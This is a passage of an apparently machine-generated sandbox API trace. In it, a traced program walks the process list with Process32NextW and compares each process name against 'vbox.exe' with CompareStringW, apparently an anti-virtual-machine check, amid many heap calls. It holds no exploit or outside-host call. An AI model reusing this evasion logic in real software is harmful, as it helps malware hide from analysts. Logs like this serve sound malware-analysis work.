RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0122.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0122.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0122.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0122.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0122.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0122.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0122.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0122.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.128] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0122.128] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0122.128] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0122.128] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0122.128] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0122.128] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0122.128] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.128] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0122.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0122.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0122.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300bd0 [0122.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300bd0 | out: hHeap=0x12c0000) returned 1 [0122.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.130] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0122.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0122.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0122.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0122.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0122.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0122.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0122.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dwm.exe", cchCount1=7, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0122.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0122.136] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0122.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0122.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0122.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0122.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0122.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0122.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0122.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0122.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0122.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0122.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1301068 [0122.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0122.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1301068 | out: hHeap=0x12c0000) returned 1 [0122.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0122.142] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0122.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0122.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0122.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd688 | out: hHeap=0x12c0000) returned 1 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0122.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0122.146] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0122.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0122.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0122.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0122.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0122.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0122.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0122.147] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300ea8 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ea8 | out: hHeap=0x12c0000) returned 1 [0122.147] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0122.147] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0122.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0122.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0122.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0122.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0122.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0122.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0122.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0122.190] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.193] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.194] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.196] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.198] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0122.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="spoolsv.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.200] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0122.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sihost.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.202] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0122.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="explorer.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.204] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0122.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RuntimeBroker.exe", cchCount1=17, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.206] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.209] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0122.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ShellExperienceHost.exe", cchCount1=23, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.211] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0122.213] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SearchUI.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.213] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0122.215] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SkypeHost.exe", cchCount1=13, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.215] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0122.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dllhost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.218] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0122.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OfficeClickToRun.exe", cchCount1=20, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.220] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 